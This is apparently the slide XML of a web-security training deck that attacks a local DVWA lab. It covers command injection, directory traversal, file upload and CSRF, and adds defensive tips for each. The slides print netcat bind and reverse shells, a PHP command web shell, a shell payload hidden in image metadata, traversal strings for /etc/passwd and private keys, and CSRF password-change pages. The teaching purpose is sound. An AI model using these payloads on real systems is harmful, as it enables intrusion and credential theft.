            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input&gt;|ls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Bind Shell:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Target: &amp; nc -lvp 4444 -e /bin/sh &amp;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attacker: nc 127.0.0.1 4444</a:t>
            </a:r>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command injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p6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blacklisting characters, whitelist what is allowed. Such as if you have a ping command input, make sure only IP address are allowed for an input only. This can be done like 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 is_numeric( $octet[0] ) ) &amp;&amp; ( is_numeric( $octet[1] ) ) &amp;&amp; ( is_numeric( $octet[2] ) ) &amp;&amp; ( is_numeric( $octet[3] ) ) &amp;&amp; ( sizeof( $octet ) == 4 ) ) {</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>        // If all 4 octets are int's put the IP back together.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];</a:t>
            </a:r>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Websites contain files that are intended for the browser (JavaScript and CSS files) and files that are not. Web servers often route their URLs to files and assets on the file system where the layout of the files on the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>mirror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the structure of the URL on the site. A server that is too permissive about what files it returns allows an attacker to access files they were not intended to view. For example, the attacker sees this url {kfc.com/menus?menu=burgers.pdf}. They then change the url to {kfc.com/menus?menu=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}. They also do ../../../../ to view the different directories. Then ../../../../etc/ssl/private.key. Now the attacker can impersonate the website and look inside encrypted traffic because they have the SSL private key.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Google Shape;438;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File Inclusion/Directory Traversal</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Inclusion / Directory Traversal Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Google Shape;444;p6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http://localhost/DVWA/vulnerabilities/fi/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>../../../../../../etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1"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localhost/DVWA/vulnerabilities/fi/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd </a:t>
            </a:r>
            <a:endParaRPr b="1"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/DVWA/vulnerabilities/fi/?page=file1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>||page=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>http://localhost/DVWA/vulnerabilities/fi/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>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 for file Inclusion / directory traversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p7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can hard code the files that are only allowed to be accessed by the user. Everything else is not permitted.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You could make a list of valid inputs and if the user’s input doesn’t match any of the values in the list they won’t be permitted access.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File Upload</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Google Shape;456;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="50970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File upload functions are a favourite for hackers because it requires the site to take a large chunk of data and write it to the disk which gives them the opportunity to smuggle malicious scripts on the server. If they can find a way to execute those scripts, they can compromise the entire system.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For example, there is a website that accepts a profile pic to be uploaded. The attacker notices that the upload files don’t get renamed as part of the upload process. The file name appears in the URL of the profile image when it is published. The attacker also notices that file-type checking is done in JavaScript, so JavaScript must be disabled to upload the file. So the attacker writes a simple php script, disables JavaScript on the browser and uploads the php file as their profile pic. When the file is uploaded, the file looks broken, however the script lives on the server. When the attacker views the location of the profile picture in the address bar, the php script is executed. From the php code they uploaded their own command execution vulnerability. The hacker then uses the command {locate my.cnf} to find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> config file. Then uses {cat /etc/mysql/my.cnf} to discover the password of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Google Shape;457;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5889550" y="1583125"/>
            <a:ext cx="282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The PHP script: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&lt;?php</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if(isset($_REQUEST['cmd']))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$cmd = ($_REQUEST['cmd']);</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system($cmd);</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 else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echo "What is your bidding?";</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?&gt;</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Broken Access Controls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Broken access controls means unauthorised users can bypass access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> checks where they can gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>unauthorised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> access leading to information disclosure, modification, destruction of data and perform business functions which was once outside of the user’s limits.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Directory Traversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="Google Shape;102;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835025" y="2708100"/>
            <a:ext cx="4255700" cy="2435400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p18"/>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Upload Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p7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t>Reverse Shell:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attacker: nc -lvnp 4444</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Target: reverse.php: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;?php echo system('nc -e /bin/sh 127.0.0.1 4444') ?&gt;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File Upload Bypass methods:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-308610" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Burp suite request, change Content-Type: application/x-php --&gt; Content-Type: image/jpeg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-308610" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exiftool -Comment="&lt;?php echo system('nc -e /bin/sh 127.0.0.1 4444') ?&gt;" cta-bg1.jpg </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-290830" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>mv cta-bg1.jpg cta-bg1.php.jpg </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-308610" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Add the php code at the end of the image data in burp suite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a way to view the files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-308610" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>../../uploads/reverse.php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://localhost/DVWA/hackable/uploads/reverse.php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-308610" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Path t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>raversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> vulnerability: http://localhost/DVWA/vulnerabilities/fi/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>http://localhost/DVWA/hackable/uploads/cta-bg1.php.jpg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file uploads </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p7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Ensure Upload Files Cannot Be Executed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rename Files on Upload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Validate File Formats and Extensions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Validate the Content-Type Header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use a Virus Scanner</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example, if an image is uploaded, strip any non-image code including metadata, validate the file formats, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>extensions, and scan the file with an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>anti-malware scanner.</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Cross-site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Google Shape;475;p7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CSRF attack happens when a user is tricked into interacting with a third-party site containing a page or script that generates a malicious request to the target site.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Websites contain a client-side and a server-side. Requests can be triggered to the server-side from anywhere, not just the client-side application. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A hacker sees the information that is being carried in the URL of an HTTP POST request. They craft an email and send it to a target with one of the links being {www.twitter.com/post?message=This+horse+know+karate!+www%2Cbit.ly%2F60138Wawd}. When the user is tricked to click this URL the post {This horse know karate! www.bit.ly/60138Wawd} to their Twitter page (for example). This is an example of a worm also because each user that clicks on the link will trick a new user to clicking the link.</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of CSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p7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CSRF have been used to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Steal confidential data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spread worms on social media.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Install malware on mobile phones.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Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p7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&lt;img src=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>"http://localhost//DVWA/vulnerabilities/csrf/?password_new=password1&amp;amp;password_conf=password1&amp;amp;Change=Change"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>&gt;</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&lt;img src=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>"/DVWA/vulnerabilities/csrf/?password_new=password&amp;password_conf=password&amp;Change=Change"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>&gt;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Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Google Shape;493;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="38178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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>// Find a way to run the code of the file below. Can be a file upload vulnerability. Then send the link to the target.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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> &lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> &lt;p&gt;TOTALLY LEGITIMATE AND SAFE WEBSITE &lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> &lt;iframe id="myFrame"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>src="http://localhost/DVWA/vulnerabilities/csrf" style="visibility:hidden;" onload="maliciousPayload()"&gt;&lt;/iframe&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> function maliciousPayload() {</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> console.log("start");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> var iframe = document.getElementById("myFrame");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> var doc = iframe.contentDocument || iframe.contentWindow.document;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
